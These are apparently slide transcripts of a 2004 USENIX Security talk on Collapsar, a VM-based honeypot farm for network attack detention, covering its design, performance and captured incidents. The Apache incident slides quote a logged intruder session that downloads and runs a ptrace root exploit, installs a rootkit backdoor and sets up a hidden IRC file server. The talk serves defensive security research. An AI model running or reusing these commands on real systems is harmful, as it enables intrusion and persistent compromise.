Transcript Collapsar: A VM-Based Architecture for Network Attack Detention

USENIX Security 2004
Collapsar: A VM-Based Architecture for
Network Attack Detention Center
Xuxian Jiang, Dongyan Xu
Department of Computer Sciences
Center for Education and Research in Information
Assurance and Security (CERIAS)
Purdue University
Outline
 Motivation
 Collapsar architecture and features
 Collapsar design, implementation, and
performance
 Collapsar deployment and real-world incidents
 Conclusion and on-going work
Motivation
 Need for network attack containment and
monitoring




Worm outbreaks (MSBlaster, Sasser…)
Debian project servers hacked (Nov. 2003)
PlanetLab nodes compromised (Dec. 2003)
And more
Motivation
 Promise of honeypots
 Providing insights into intruders’ motivations,
tactics, and tools
 Highly concentrated datasets w/ low noise
 Low false-positive and false negative rate
 Discovering unknown vulnerabilities/exploitations
 Example: CERT advisory CA-2002-01 (solaris CDE
subprocess control daemon – dtspcd)
Current Honeypot Operation
 Individual honeypots
 Limited local view of attacks
 Federation of distributed honeypots
 Deploying honeypots in different networks
 Exchanging logs and alerts
 Problems
 Difficulties in distributed management
 Lack of honeypot expertise
 Inconsistency in security and management policies
 Example: log format, sharing policy, exchange frequency
Our Solution: Collapsar
 Based on the HoneyFarm idea of Lance Spitzner
 Achieving two (seemingly) conflicting goals
 Distributed honeypot presence
 Centralized honeypot operation
 Key ideas
 Leveraging unused IP addresses in each network
 Diverting corresponding traffic to a “detention”
center (transparently)
 Creating VM-based honeypots in the center
Collapsar Architecture
Production
Network
Redirector
Attacker
Production
Network
Redirector
Redirector
Front-End
Production
Network
VM-based
Honeypot
Management
Station
Correlation
Engine
Collapsar
Center
Comparison with Current Approaches
 Overlay-based approach (e.g., NetBait, Domino
overlay)
 Honeypots deployed in different sites
 Logs aggregated from distributed honeypots
 Data mining performed on aggregated log
information
 Key difference: where the attacks take place
(on-site vs. off-site)
Comparison with Current Approaches
 Sinkhole networking approach (e.g., iSink )
 “Dark” space to monitor Internet abnormality and
commotion (e.g. msblaster worms)
 Limited interaction for better scalability
 Key difference: contiguous large address blocks
(vs. scattered addresses)
Comparison with Current Approaches
 Low-interaction approach (e.g., honeyd, iSink )
 Highly scalable deployment
 Low security risks
 Key difference: emulated services (vs. real things)
 Less effective to reveal unknown vulnerabilities
 Less effective to capture 0-day worms
Collapsar Design
 Functional components
 Redirector
 Collapsar Front-End
 Virtual honeypots
 Assurance modules
 Logging module
 Tarpitting module
 Correlation module
Functional Components
 Redirector
 Running in each participating network
 Capturing traffic toward unused IP addresses
 Redirecting to Collapsar Front-End
 Two implementation options
 Proxy-ARP approach
 Longer latency
 Minimum change to network infrastructure
 GRE (Generic Routing Encapsulation) approach
 Lower latency
 Requiring router re-configuration
 Missing attack traffic from inside a domain
Functional Components
 Collapsar Front-End
 Dispatching incoming traffic to different
honeypots
 Transparent bridging
 Mitigating security risks
 Transparent firewalling
 Packet re-writing
 Assurance module plug-in
 Logging modules
 Tarpitting modules
Functional Components
 Virtual honeypots
 VM-based high-interaction honeypots
 VMware
 Enhanced User-Mode Linux (UML)
 Commodity OS and popular services
 Linux, Windows, Solaris, FreeBSD
 Apache, samba, sendmail, named
 Capability of forensic analysis
 System image snapshot / restoration
Assurance Modules
 Logging module
 Traffic logging
(e.g., tcpdump, snort)
 Where: Front-End and honeypots
 Keystroke logging
(e.g., sebek)
 Where: honeypots
 Tarpitting module
 Mitigating security risks
 Where: Front-End
 Correlation module
 Mining and correlation
(e.g., snort-inline)
Performance Measurement
 Measurement set-up
Collapsar
Center
VMware or UML
H
A
Redirector
Dell Desktop PC
(1.8GHz Pentium 4/768MB Memory)
Front-End
Dell PowerEdge Server
(2.6GHz Xeon/2GB Memory)
 Metrics
 TCP throughput
 Nock (http://www.cs.wisc.edu/~zandy/p/nock)
 ICMP latency
Measurement Results
TCP throughput
Measurement Results
ICMP latency
Collapsar Deployment
 Deployed in a local environment for a two-month
period in 2003
 Traffic redirected from five networks
 Three wired LANs
 One wireless LAN
 One DSL network
 ~ 40 honeypots analyzed so far
 Internet worms (MSBlaster, Enbiei, Nachi )
 Interactive intrusions (Apache, Samba)
 OS: Windows, Linux, Solaris, FreeBSD
Incident: Apache Honeypot/VMware
 Vulnerabilities
 Vul 1: Apache (CERT® CA-2002-17)
 Vul 2: Ptrace (CERT® VU-6288429)
 Time-line
 Deployed: 23:44:03pm, 11/24/03
 Compromised: 09:33:55am, 11/25/03
 Attack monitoring
 Detailed log
 http://www.cs.purdue.edu/homes/jiangx/collapsar
Incident: Apache Honeypot/VMware
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export
HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz
Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`'
******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhatrelease`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suserelease`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat
/etc/slackware-version`; fi; uname -a; id; echo
1. Gaining a regular
account: apache
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget
http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc
ptrace-kmod.c -o p;./p
2. Escalating to the
root privilege
Incident: Apache Honeypot/VMware
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget
http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf
shv4.tar.gz;cd shv4;./setup rooter 1985
3. Installing a set
of backdoors
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTYRelease-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser
ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd;
4. Adding the ftp user
mkdir .logs;cd .logs
and installing a
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget
IRC-based ftp server
http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf
iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null &
Incident: Windows XP Honeypot/VMware
 Vulnerability
 RPC DCOM Vul. (Microsoft
Security Bulletin MS03-026)
 Time-line
 Deployed: 22:10:00pm,
11/26/03
 MSBlaster: 00:36:47am,
11/27/03
 Enbiei: 01:48:57am,
11/27/03
 Nachi: 07:03:55am,
11/27/03
Log Correlation: Stepping Stone
iii.jjj.kkk.11 compromised a honeypot
& installed a rootkit, which contained
an ssh backdoor
xx.yyy.zzz.3 connected to the ssh
backdoor using the same passwd
Log Correlation: Network Scanning
Conclusions
 A new architecture for attack containment and
monitoring
 Distributed presence and centralized operation of
honeypots
 Good potential in attack correlation and log mining
 Unique features
 Aggregation of Scattered unused IP addresses
 Off-site (relative to participating networks) attack
occurrences and monitoring
 Real services for unknown vulnerability revelation
On-going Work
 Integration into trusted server architectures
(SODA and Poly2)
 On-demand honeypot customization
 Collapsar center federation
 Scalability
 Testbed for worm containment (coming soon)
Thank you.
For more information:
Email: {dxu, jiangx}@cs.purdue.edu
URL: www.cs.purdue.edu/~dxu
Google: “Purdue Collapsar friends”